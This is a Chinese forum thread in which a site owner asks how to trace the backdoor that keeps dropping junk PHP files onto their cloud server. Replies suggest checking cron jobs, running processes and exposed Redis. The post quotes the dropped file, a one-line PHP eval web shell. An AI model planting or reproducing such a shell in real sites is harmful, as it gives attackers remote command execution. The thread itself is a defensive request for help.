网站隔几天就会在 web 的一些目录下生成垃圾.php 的脚本文件。比如最近的一个 php 文件:
< php ? php @ eval ( $_POST [ 'cmd ']) ; ? >
只有这么一句话的恶意脚本。
我的服务器在阿里云,也买了安骑士杀毒,但是只能检测到恶意脚本,并隔离,但具体这些脚本怎么生成的无法得知,因为隔离了,几天后又有新的垃圾脚本生成。也就是我的 linux 系统里是不是有后门,怎么揪出来? 还请各位服务器大神给点建议,指点迷津。
102
ningcool OP 谢谢你的建议,wp 我也在用,感觉确实慢了一些。用到了缓存插件好了一点。
|
104
hugedata 2017-07-11 17:48:15 +08:00
哥们,看看服务器有没有定时任务或者进程里有不正常的,另外,你没有装 Redis 吧?现在阿里云上装 redis 的中招的不少,被控挖矿的比较多。
|